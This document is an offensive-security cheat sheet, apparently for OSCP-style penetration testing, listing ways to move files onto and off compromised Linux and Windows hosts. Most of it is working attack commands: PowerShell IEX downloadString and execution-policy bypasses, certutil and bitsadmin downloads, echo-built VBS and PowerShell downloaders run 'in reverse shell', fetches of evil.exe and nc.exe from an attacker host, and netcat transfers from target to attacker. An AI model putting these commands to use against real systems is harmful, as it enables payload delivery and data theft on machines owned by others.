My Checklist

smbserver.py a path
copy \\ip\a\exploit.exe

Linux Transfer

wget http://IP_ADDR/file -O /path/to/where/you/want/file/to/go

curl http://IP_ADDR/file

fetch http://IP_ADDR/file

nc IP_ADDR PORT > OUTFILE (run nc -lvp PORT < infile on attacking machine)

ftp -s:input.txt

tftp -i get file /path/on/victim



Windows Transfer

bitsadmin /transfer download /priority normal http://IP_ADDR/file C:\output\path (Works on Windows 7/Windows Server 2000+)

nc IP_ADDR PORT > OUTFILE (run nc -lvp PORT < infile on attacking machine)

ftp -s:input.txt

tftp -i get file /path/on/victim

powershell.exe -exec bypass -Command "& {iex((New-Object System.Net.WebClient).DownloadFile('http://IP_ADDR:PORT/FILE','C:\Users\user\AppData\Local\ack.exe'));}"

certutil -urlcache -split -f "http://IP_ADDR/FILE" FILENAME

smbserver

smbserver.py a ~/oscp

Powershell  script

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://IP_ADDR/FILE" >> wget.ps1
echo $file = "FILE" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File <filename>



VBS
# In reverse shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

# Execute
cscript wget.vbs http://10.10.10.10/file.exe file.exe

HTTP
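# In Kali (SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is: python3 -m http.server 80)
# The server exposes the current directory, unauthenticated, to anyone who can reach the port:
# start it in a directory that holds only the files to share, and stop it when the transfer is done.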
python -m SimpleHTTPServer 80

# In reverse shell - Linux
wget 10.10.10.10/file

# In reverse shell - Windows
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"


#linux
python -m SimpleHTTPServer 9999


#wget
wget 192.168.1.102:9999/file.txt

#curl
curl -O http://192.168.0.101/file.txt

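#ncat (plain TCP: no authentication, no encryption, no integrity check; compare a checksum of the file on both ends after the transfer)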
#attacking machine
nc -lvp 4444 < file

#target machine
nc 192.168.1.102 4444 > file


#php
echo "<?php file_put_contents('nameOfFile', fopen('http://ip/file', 'r')); ?>" > down2.php


#tftp
$ tftp 192.168.0.101
tftp> get myfile.txt
tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"


#scp
# Copy a file:
scp /path/to/source/file.ext username@ip:/path/to/destination/file.ext

# Copy a directory:
scp -r /path/to/source/dir username@ip:/path/to/destination


#python
Python SimpleHTTPServer

#on Attacker
python -m SimpleHTTPServer

#on target
wget <attackerip>:8000/filename


------------------------------

Apache

#on Attacker
cp filetosend.txt /var/www/html
service apache2 start

#on target
wget http://attackerip/file
curl http://attackerip/file > file
fetch http://attackerip/file        # on BSD

----------------------------------

Netcat (From Target to Kali)

# Listen on Kali
nc -lvp 4444 > file

# Send from Target machine
nc <kali_ip> 4444 < file

-----------------


Netcat (From Kali to Target)

# on target, wait for the file
nc -nvlp 55555 > file

# on kali, push the file
nc $victimip 55555 < file


----------------------

Extra:
To send the executable file to your machine:

base64 executable
# copy the output
# paste it in a file called file.txt
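# decode it and create the executable; compare a checksum (e.g. sha256sum) on both machines,
# since copy/paste can silently drop or wrap characters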
base64 -d file.txt > executable





#windows
https://blog.ropnop.com/transferring-files-from-kali-to-windows/
https://blog.netspi.com/15-ways-to-download-a-file/

 certutil -urlcache -f http://ip/1.exe 1.exe


#Powershell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.10.10/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1


#VBS
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://attackerip/evil.exe evil.exe

#powershell
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"
powershell -c "Invoke-WebRequest -Uri http://10.10.14.23/bfill.exe -OutFile C:\Users\kostas\Desktop\bfill.exe"
powershell "IEX(New-Object Net.WebClient).downloadString('http://<targetip>/file.ps1')"



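#FTP (ftp.txt holds the username and password in clear text, and FTP also sends them unencrypted: use a throwaway account and delete ftp.txt afterwards)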
echo open 192.168.1.101 21> ftp.txt
echo USER asshat>> ftp.txt
echo mysecretpassword>> ftp.txt
echo bin>> ftp.txt
echo GET wget.exe>> ftp.txt
echo bye>> ftp.txt

ftp -v -n -s:ftp.txt

#debug
wine exe2bat.exe nc.exe nc.txt




--------------------------------------
TFTP
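# Windows XP and Windows 2003 include a TFTP client; Windows 7 does not by default
# TFTP clients are usually non-interactive, so they can work through an obtained shell
# TFTP has no authentication or encryption, so keep the daemon's directory limited to the files being shared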

atftpd --daemon --port 69 /tftp
Windows> tftp -i ip GET nc.exe

--------------------------------------

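FTP (pyftpdlib server on Kali)
# An ftp client is generally installed on Windows machines
# The client is interactive by default; to drive it from a non-interactive shell, use the -s:<file> option so it reads its commands from a script file

# On Kali, install pyftpdlib (an FTP server) and start it on port 21
# (as started below, no username/password is configured, so it allows anonymous access; stop it when the transfer is done)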
apt-get install python-pyftpdlib  
python -m pyftpdlib -p 21

# on Windows
ftp <attackerip>
> binary
> get exploit.exe

-------------------------------------------

FTP (Pure-FTPd server on Kali)

# on Kali

# install the FTP server
apt-get install pure-ftpd

# create a group
groupadd ftpgroup

# add a user
useradd -g ftpgroup -d /dev/null -s /etc ftpuser

# Create a directory for your ftp-files (you can also specify a specific user e.g.: /root/ftphome/bob).
mkdir /root/ftphome

# Create a ftp-user, in our example "bob" (again you can set "-d /root/ftphome/bob/" if you wish).
pure-pw useradd bob -u ftpuser -g ftpgroup -d /root/ftphome/

# Update the ftp database after adding our new user.
pure-pw mkdb

# change ownership of the specified ftp directory (and all its sub-directories)
chown -R ftpuser:ftpgroup /root/ftphome

# restart Pure-FTPD
/etc/init.d/pure-ftpd restart


# On Windows
echo open <attackerip> 21> ftp.txt
echo USER username password >> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

--------------------------------------

Powershell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://<attackerip>/powerup.ps1" >>wget.ps1
echo $file = "powerup.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

--------------------------------------
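# PowerShell: download a script and run it in memory (IEX on DownloadString); no file is written to disk,
# but the script text is still recorded as event 4104 when PowerShell script block logging is enabled
powershell "IEX(New-Object Net.WebClient).downloadString('http://<targetip>/file.ps1')"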
